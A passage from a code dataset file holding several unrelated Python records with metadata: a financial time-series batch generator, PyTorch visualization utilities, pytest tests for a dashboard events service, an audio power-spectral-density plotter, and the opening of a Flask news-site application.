cached\n random.shuffle(self._batch_cache)\n self._batch_cusror = 0\n return\n\n def rewind(self):\n \"\"\"\n Resets _batch_cursor index to ensure we're working with the first batch.\n \"\"\"\n self._batch_cursor = 0\n\n def get_scaling_params(self, scaler_class):\n if self._scaling_params is None:\n stride = self._stride\n data = self._data\n sample = list()\n z = zip(self._start_indices,self._end_indices)\n indices = random.sample(list(z),\n int(0.10*len(self._start_indices)))\n for start_idx, end_idx in indices:\n step = random.randrange(self._min_unrollings)\n cur_idx = start_idx+step*stride\n x1 = self._get_feature_vector(end_idx,cur_idx)\n sample.append(x1)\n #x2 = self._get_aux_vector(i,idx)\n 
#sample.append(np.append(x1,x2))\n\n scaler = None\n if hasattr(sklearn.preprocessing, scaler_class):\n scaler = getattr(sklearn.preprocessing, scaler_class)()\n else:\n raise RuntimeError(\"Unknown scaler = %s\"%scaler_class)\n\n scaler.fit(sample)\n\n params = dict()\n params['center'] = scaler.center_ if hasattr(scaler,'center_') else scaler.mean_\n params['scale'] = scaler.scale_\n\n num_aux = len(self._aux_colixs)\n if num_aux > 0:\n params['center'] = np.append(params['center'], np.full( (num_aux), 0.0 ))\n params['scale'] = np.append(params['scale'], np.full( (num_aux), 1.0 ))\n\n self._scaling_params = params\n\n return self._scaling_params\n\n def get_raw_inputs(self,batch,idx,vec):\n len1 = len(self._fin_colixs)\n len2 = len(self._aux_colixs)\n n = batch.normalizers[idx]\n x = vec[0:len1]\n y = n * np.multiply(np.sign(x),np.expm1(np.fabs(x)))\n if len2 > 0 and len(vec) > len1:\n assert(len(vec)==len1+len2)\n y = np.append( y, vec[len1:len1+len2] )\n return y\n\n def get_raw_outputs(self,batch,idx,vec):\n if self._price_target_idx >= 0:\n return vec\n else:\n return self.get_raw_inputs(batch,idx,vec)\n\n @property\n def feature_names(self):\n return self._input_names\n\n @property\n def dataframe(self):\n return self._data\n\n @property\n def num_batches(self):\n return self._num_batches\n\n @property\n def max_unrollings(self):\n return self._max_unrollings\n\n @property\n def num_inputs(self):\n return self._num_inputs\n\n @property\n def num_outputs(self):\n return self._num_outputs\n\nclass Batch(object):\n def __init__(self, inputs, targets, attribs, normalizers, seq_lengths):\n self._inputs = inputs\n self._targets = targets\n self._attribs = attribs\n self._normalizers = normalizers\n self._seq_lengths = seq_lengths\n\n @property\n def inputs(self):\n return self._inputs\n\n @property\n def targets(self):\n return self._targets\n\n @property\n def attribs(self):\n return self._attribs\n\n #@property\n #def size(self):\n # return len(self._attribs)\n\n @property\n def normalizers(self):\n return self._normalizers\n\n @property\n def seq_lengths(self):\n return self._seq_lengths\n", "sub_path": "scripts/batch_generator.py", "file_name": "batch_generator.py", "file_ext": "py", "file_size_in_byte": 35966, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 140, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 144, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 150, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 157, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 158, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 173, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 304, "usage_type": "attribute"}, {"api_name": "random.sample", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.vectorize", 
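The `batch_generator.py` record above leans on three APIs that have since been removed: `OneHotEncoder(n_values=...)` (gone in scikit-learn 0.22), `DataFrame.as_matrix()` (gone in pandas 1.0), and the `np.float` alias (gone in NumPy 1.24). Below is a minimal sketch of the `encode_cat_attrib` step against current APIs; the frame is synthetic stand-in data, since the original loads its category levels from per-field `*-encoding.dat` files.

```python
# Sketch of the encode_cat_attrib step from the record above, using
# current pandas/scikit-learn APIs. The frame is synthetic; the original
# reads the category levels from a "<field>-encoding.dat" file instead.
import pandas as pd
from sklearn.preprocessing import OneHotEncoder

data = pd.DataFrame({"gvkey": ["001", "002", "003"],
                     "sector": ["tech", "energy", "tech"]})

# n_values= was removed in scikit-learn 0.22; declare the known levels
# via categories= and densify with .toarray(), as the original did.
enc = OneHotEncoder(categories=[["energy", "tech"]])
onehot = enc.fit_transform(data[["sector"]]).toarray()

colnames = ["is_" + lev for lev in enc.categories_[0]]
data = pd.concat([data, pd.DataFrame(onehot, columns=colnames)], axis=1)

# DataFrame.as_matrix() was removed in pandas 1.0; use .to_numpy().
fin_inputs = data[colnames].to_numpy()
print(data)
```

Incidentally, `shuffle()` in the same record assigns `self._batch_cusror = 0`; the misspelling silently creates a new attribute instead of rewinding `_batch_cursor`.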
"line_number": 445, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 455, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.sign", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.log1p", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 458, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 465, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 488, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 489, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 535, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 536, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 537, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 538, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 552, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 612, "usage_type": "call"}, {"api_name": "time.time", "line_number": 617, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 620, "usage_type": "call"}, {"api_name": "time.time", "line_number": 623, "usage_type": "call"}, {"api_name": "time.time", "line_number": 632, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 634, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 634, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 641, "usage_type": "call"}, {"api_name": "time.time", "line_number": 644, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 647, "usage_type": "call"}, {"api_name": "time.time", "line_number": 649, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 661, "usage_type": "call"}, {"api_name": "os.path", "line_number": 661, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 663, "usage_type": "call"}, {"api_name": "os.path", "line_number": 663, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 664, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 666, "usage_type": "call"}, {"api_name": "os.path", "line_number": 666, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 705, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 721, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 724, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.preprocessing", "line_number": 732, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing", "line_number": 732, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.preprocessing", "line_number": 733, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing", "line_number": 733, "usage_type": "name"}, {"api_name": "numpy.append", "line_number": 745, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 745, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 746, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 746, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.sign", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.expm1", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.fabs", "line_number": 757, "usage_type": 
"call"}, {"api_name": "numpy.append", "line_number": 760, "usage_type": "call"}]} +{"seq_id": "472277305", "text": "from __future__ import division\nimport torch\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef make_numpy_grid(batch1):\n\n ncols = len(batch1) # 2 or 3\n n, c, h, w = batch1[0].size()\n\n batch1 = list(batch1)\n batch1[0] = (batch1[0][0].numpy().transpose(1, 2, 0) * 255).astype(np.uint8)\n\n # batch1[1] = (batch1[1] - batch1[1].min()) / (batch1[1].max() - batch1[1].min())\n batch1[1] = (batch1[1][0].numpy() * 255).astype(np.uint8)\n batch1[1] = np.expand_dims(batch1[1], 2)\n batch1[1] = np.repeat(batch1[1], 3, 2)\n\n if ncols > 2:\n batch1[2] = (batch1[2] - batch1[2].min()) / (batch1[2].max() - batch1[2].min())\n batch1[2] = (batch1[2][0, 1, ...].numpy() * 255).astype(np.uint8)\n batch1[2] = np.expand_dims(batch1[2], 2)\n batch1[2] = np.repeat(batch1[2], 3, 2)\n grid = np.concatenate(batch1, axis=1)\n return grid\n\n\ndef imshow_batch(batch, save_draw_path):\n grid = make_numpy_grid(batch)\n plt.title(\"Batch\")\n if not save_draw_path:\n plt.imshow(grid)\n plt.show()\n else:\n random_name = np.random.randint(0, 2 ** 10)\n plt.imsave(save_draw_path + str(random_name) + \".png\", grid)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n arg = parser.add_argument\n arg(\"--mode\", choices=[\"train\", \"predict\", \"validate\", \"visualize\"], default=\"train\")\n arg(\"--size\", type=str, default='264x176', help='Resizing output')\n arg(\"--model\", type=str)\n arg(\"--batch\", type=int, default=1)\n arg(\"--chunk\", type=int, default=-1)\n arg(\"--shuffle\", type=int, default=1)\n arg(\"--epochs\", type=int, default=10)\n arg(\"--lr\", type=float, default=1e-3)\n arg(\"--validate\", type=int, default=1)\n arg(\"--draw_every\", type=int, default=0)\n arg(\"--show\", type=int, default=0)\n arg(\"--save_draw_path\", type=str, default=None)\n arg(\"--save\", type=int, default=1)\n arg(\"--save_path\", type=str, default=\"../models\")\n arg(\"--root\", type=str, default=\"../data/\")\n args = parser.parse_args()\n return args\n\n", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2048, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.uint8", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "numpy.random.randint", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 37, "usage_type": "attribute"}, 
{"api_name": "matplotlib.pyplot.imsave", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "634502649", "text": "#\n# Copyright (c) 2016 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport pytest\n\nfrom modules.constants import TapComponent as TAP, Urls\nfrom modules.markers import components, priority\nfrom modules.tap_logger import step\nfrom modules.tap_object_model import LatestEvent, Organization, Transfer, User\nfrom tests.fixtures.assertions import assert_unordered_list_equal\n\nlogged_components = (TAP.latest_events_service,)\npytestmark = [components.latest_events_service]\n\n\n@pytest.mark.usefixtures(\"add_admin_to_test_org\")\nclass TestDashboardLatestEvents:\n\n @pytest.fixture(scope=\"function\")\n def another_org(self, context):\n step(\"Create another test organization\")\n another_org = Organization.api_create(context)\n return another_org\n\n @pytest.fixture(scope=\"function\")\n def another_org_client(self, context, another_org):\n step(\"Create org manager in another org\")\n user = User.api_create_by_adding_to_organization(org_guid=another_org.guid, context=context)\n return user.login()\n\n @priority.high\n def test_10_latest_events_on_dashboard_the_same_as_in_LES(self, context, test_org):\n step(\"Produce an event in the tested organization - create a data set\")\n transfer = Transfer.api_create(context, org_guid=test_org.guid, source=Urls.test_transfer_link)\n transfer.ensure_finished()\n step(\"Retrieve latest events from dashboard\")\n dashboard_latest_events = LatestEvent.api_get_latest_events_from_org_metrics(test_org.guid)\n step(\"Retrieve latest events from the LES, filtering with tested organization\")\n latest_events_response = LatestEvent.api_get_latest_events(test_org.guid)\n step(\"Check that dashboard contains 10 latest events from LES\")\n ten_latest_events = sorted(latest_events_response, reverse=True)[:10]\n assert_unordered_list_equal(ten_latest_events, dashboard_latest_events)\n\n @priority.low\n def test_visibility_of_events(self, test_org, context, test_org_manager_client):\n events_before = LatestEvent.api_get_latest_events_from_org_metrics(test_org.guid)\n step(\"Create dataset by admin\")\n transfer = Transfer.api_create(context, org_guid=test_org.guid, source=Urls.test_transfer_link)\n transfer.ensure_finished()\n events_after = LatestEvent.api_get_latest_events_from_org_metrics(test_org.guid)\n step(\"Check admin dataset creation event is visible\")\n assert len(events_before) + 1 == len(events_after)\n step(\"Create dataset by non-admin user\")\n transfer = Transfer.api_create(context, org_guid=test_org.guid, source=Urls.test_transfer_link,\n client=test_org_manager_client)\n transfer.ensure_finished()\n events_after = LatestEvent.api_get_latest_events_from_org_metrics(test_org.guid, client=test_org_manager_client)\n step(\"Check that non-admin dataset 
creation event is visible\")\n assert len(events_before) + 2 == len(events_after)\n\n @priority.low\n def test_events_visibility_from_another_org(self, test_org, context, another_org, another_org_client):\n events_before = LatestEvent.api_get_latest_events_from_org_metrics(another_org.guid, client=another_org_client)\n step(\"Create dataset in another org\")\n transfer = Transfer.api_create(context, org_guid=another_org.guid, source=Urls.test_transfer_link,\n client=another_org_client)\n transfer.ensure_finished()\n step(\"Check event is on the latest events list\")\n events_after = LatestEvent.api_get_latest_events_from_org_metrics(another_org.guid, client=another_org_client)\n assert len(events_before) + 1 == len(events_after), \"The new event is not visible\"\n step(\"Check events from one org are not visible in another org\")\n test_org_events = LatestEvent.api_get_latest_events_from_org_metrics(test_org.guid)\n assert all((event not in test_org_events for event in events_after)), \\\n \"Some events from the another org are visible in first org\"\n", "sub_path": "project/tests/test_functional/dashboard/test_latest_events.py", "file_name": "test_latest_events.py", "file_ext": "py", "file_size_in_byte": 4611, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "modules.constants.TapComponent.latest_events_service", "line_number": 25, "usage_type": "attribute"}, {"api_name": "modules.constants.TapComponent", "line_number": 25, "usage_type": "name"}, {"api_name": "modules.markers.components.latest_events_service", "line_number": 26, "usage_type": "attribute"}, {"api_name": "modules.markers.components", "line_number": 26, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 34, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Organization.api_create", "line_number": 35, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Organization", "line_number": 35, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 32, "usage_type": "call"}, {"api_name": "modules.tap_logger.step", "line_number": 40, "usage_type": "call"}, {"api_name": "modules.tap_object_model.User.api_create_by_adding_to_organization", "line_number": 41, "usage_type": "call"}, {"api_name": "modules.tap_object_model.User", "line_number": 41, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 38, "usage_type": "call"}, {"api_name": "modules.tap_logger.step", "line_number": 46, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer.api_create", "line_number": 47, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer", "line_number": 47, "usage_type": "name"}, {"api_name": "modules.constants.Urls.test_transfer_link", "line_number": 47, "usage_type": "attribute"}, {"api_name": "modules.constants.Urls", "line_number": 47, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 49, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events_from_org_metrics", "line_number": 50, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 50, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 51, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events", "line_number": 52, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 52, "usage_type": "name"}, {"api_name": 
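The test module above chains function-scoped fixtures (`another_org` feeds `another_org_client`) and marks tests by priority. Below is a self-contained sketch of that fixture chaining, with plain dicts standing in for the TAP `Organization`/`User` models.

```python
# Minimal sketch of the fixture chaining used in the record above: one
# function-scoped fixture builds on another, and a test consumes both.
# The dicts are stand-ins for the project's Organization/User objects.
import pytest

@pytest.fixture(scope="function")
def another_org():
    return {"guid": "org-1234"}

@pytest.fixture(scope="function")
def another_org_client(another_org):
    # The original creates a User in the org and returns user.login().
    return {"org_guid": another_org["guid"], "token": "fake-token"}

def test_client_belongs_to_org(another_org, another_org_client):
    assert another_org_client["org_guid"] == another_org["guid"]
```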
"modules.tap_logger.step", "line_number": 53, "usage_type": "call"}, {"api_name": "tests.fixtures.assertions.assert_unordered_list_equal", "line_number": 55, "usage_type": "call"}, {"api_name": "modules.markers.priority.high", "line_number": 44, "usage_type": "attribute"}, {"api_name": "modules.markers.priority", "line_number": 44, "usage_type": "name"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events_from_org_metrics", "line_number": 59, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 59, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 60, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer.api_create", "line_number": 61, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer", "line_number": 61, "usage_type": "name"}, {"api_name": "modules.constants.Urls.test_transfer_link", "line_number": 61, "usage_type": "attribute"}, {"api_name": "modules.constants.Urls", "line_number": 61, "usage_type": "name"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events_from_org_metrics", "line_number": 63, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 63, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 64, "usage_type": "call"}, {"api_name": "modules.tap_logger.step", "line_number": 66, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer.api_create", "line_number": 67, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer", "line_number": 67, "usage_type": "name"}, {"api_name": "modules.constants.Urls.test_transfer_link", "line_number": 67, "usage_type": "attribute"}, {"api_name": "modules.constants.Urls", "line_number": 67, "usage_type": "name"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events_from_org_metrics", "line_number": 70, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 70, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 71, "usage_type": "call"}, {"api_name": "modules.markers.priority.low", "line_number": 57, "usage_type": "attribute"}, {"api_name": "modules.markers.priority", "line_number": 57, "usage_type": "name"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events_from_org_metrics", "line_number": 76, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 76, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 77, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer.api_create", "line_number": 78, "usage_type": "call"}, {"api_name": "modules.tap_object_model.Transfer", "line_number": 78, "usage_type": "name"}, {"api_name": "modules.constants.Urls.test_transfer_link", "line_number": 78, "usage_type": "attribute"}, {"api_name": "modules.constants.Urls", "line_number": 78, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 81, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events_from_org_metrics", "line_number": 82, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent", "line_number": 82, "usage_type": "name"}, {"api_name": "modules.tap_logger.step", "line_number": 84, "usage_type": "call"}, {"api_name": "modules.tap_object_model.LatestEvent.api_get_latest_events_from_org_metrics", "line_number": 85, "usage_type": "call"}, {"api_name": 
"modules.tap_object_model.LatestEvent", "line_number": 85, "usage_type": "name"}, {"api_name": "modules.markers.priority.low", "line_number": 74, "usage_type": "attribute"}, {"api_name": "modules.markers.priority", "line_number": 74, "usage_type": "name"}, {"api_name": "pytest.mark.usefixtures", "line_number": 29, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 29, "usage_type": "attribute"}]} +{"seq_id": "262371564", "text": "#!/usr/bin/env python\n# Plot the Power Spectral Density of an Audio Source\n# Started on Thursday of January 31, 2019 by kongrawd.\n# Version of February 13, 2019: Support input of higher bitrate mono audio.\n\nimport os, sys\nfrom scipy.io import wavfile\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg') # rendering backend: macOS\nimport matplotlib.pyplot as plt\n\nfilename = 'speech/TH_th-thaiweather1_cut2.wav'\n\n# obtain path in the same folder of the script\nfrom os import path\naudio_file = path.join(os.path.abspath(os.path.dirname(sys.argv[0])), filename)\nfs, data = wavfile.read(audio_file)\n\n# subplot grid magic\nfig = plt.figure(figsize=(6, 4))\n# use matplotlib to estimate and plot the PSD\nplt.subplot(2,1,1).psd(data, NFFT=512, Fs=fs, Fc=0)\nstartPSD, endPSD = plt.subplot(2,1,1).get_xlim()\ninterval_tick = np.around(fs/20, decimals=-2)\nplt.subplot(2,1,1).set_xticks(np.arange(0, endPSD, interval_tick)) \nplt.subplot(2,1,1).set_xlabel('Frequency (Hz)')\nplt.subplot(2,1,1).set_ylabel('Relative Power (dB)')\n# input signal\nplt.subplot(2,2,3).plot(data)\nplt.subplot(2,2,3).set_title('Waveform') \nplt.subplot(2,2,3).set_xlabel('Sample')\nplt.subplot(2,2,3).set_ylabel('Amplitude')\n# spectogram\nplt.subplot(2,2,4).specgram(data, NFFT=2048, Fs=fs) \nplt.subplot(2,2,4).set_title('Spectrogram') \nplt.subplot(2,2,4).set_xlabel('Time (s)') \nplt.subplot(2,2,4).set_ylabel('Frequency (Hz)') \n\n# show plot\nplt.tight_layout()\nfig.subplots_adjust(top=0.88)\nfig.suptitle('PSD of '+filename)\n# save plot\nplt.savefig(filename+'.png', dpi=300)\nplt.show()", "sub_path": "audio2psd.py", "file_name": "audio2psd.py", "file_ext": "py", "file_size_in_byte": 1557, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "matplotlib.use", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "scipy.io.wavfile.read", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.around", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, 
{"api_name": "numpy.arange", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "383688886", "text": "# -*- coding: utf-8 -*-\n\nfrom flask import request, redirect, session ,flash ,send_from_directory\nfrom flask_login import logout_user\nfrom flask_login import login_user\nfrom flask_login import login_required\nfrom flask_login import current_user\nfrom flask_login import UserMixin\nfrom flask_login import LoginManager\nfrom flask_session import Session\nfrom flask import render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import exc , func\nfrom flask import Flask, url_for, jsonify, g\nfrom flask_ckeditor import CKEditor ,upload_success, upload_fail\nfrom flask_ckeditor import upload_success, upload_fail\nfrom werkzeug.utils import secure_filename\nfrom datetime import timedelta\n\nfrom Config import config , time_format_config\nfrom Config import allow_file_config ,list_unable_page \nfrom Config import path_Root_FileDownloadDirectory\nfrom Config import list_news_class,list_news_storagemanage_class,list_addnews_class,list_editnews_class\n\nimport codecs\nimport datetime as dtime\nimport os\nimport time\nimport shutil\n# import hashlib\n\napp = Flask(__name__,\n static_url_path='',\n static_folder='static',\n template_folder='templates')\n \n# 載入 Flask Config Setting Values,模式為 developermentConfig\napp.config.from_object(config['developermentConfig'])\n\ndb = SQLAlchemy(app)\n\n# time format settings\ntime_format = 
time_format_config['time_format']\ntime_format_m_id = time_format_config['time_format_m_id']\ntime_format_ckupload_img = time_format_config['time_format_ckupload_img']\n\n# print(\"time_format : {}\".format(time_format))\n# print(\"time_format_m_id : {}\".format(time_format_m_id))\n# print(\"time_format_ckupload_img : {}\".format(time_format_ckupload_img))\n\nckeditor = CKEditor()\nckeditor.init_app(app)\n\n\n# 設置上傳檔案類型控制\n# http://flask.pocoo.org/docs/1.0/patterns/fileuploads/\nALLOWED_IMAGE_EXTENSIONS = allow_file_config['ALLOWED_IMAGE_EXTENSIONS']\nALLOWED_File_EXTENSIONS = allow_file_config['ALLOWED_File_EXTENSIONS']\n# print(\"ALLOWED_IMAGE_EXTENSIONS : {}\".format(ALLOWED_IMAGE_EXTENSIONS))\n# print(\"ALLOWED_File_EXTENSIONS : {}\".format(ALLOWED_File_EXTENSIONS))\n\n''' 從Model中匯入資料表模型 '''\nfrom Model import User as User_Admin # 使用者帳戶(User)\nfrom Model import Department as DP # 科系部門(Department)\nfrom Model import News # 最新消息(News)\nfrom Model import NewsFile # 最新消息附件(NewsFile)\n\n# 設定專案預設編碼格式\ncodecs.register(lambda name: codecs.lookup(\n 'utf8') if name == 'utf8mb4' else None)\n\n# 取得當前所在位置\ncurrentPath = os.getcwd()\n# print('currentPath: ' + currentPath)\n\n\n# Flask Login Packge Config\nlogin_manager = LoginManager()\nlogin_manager.login_view = 'login' # 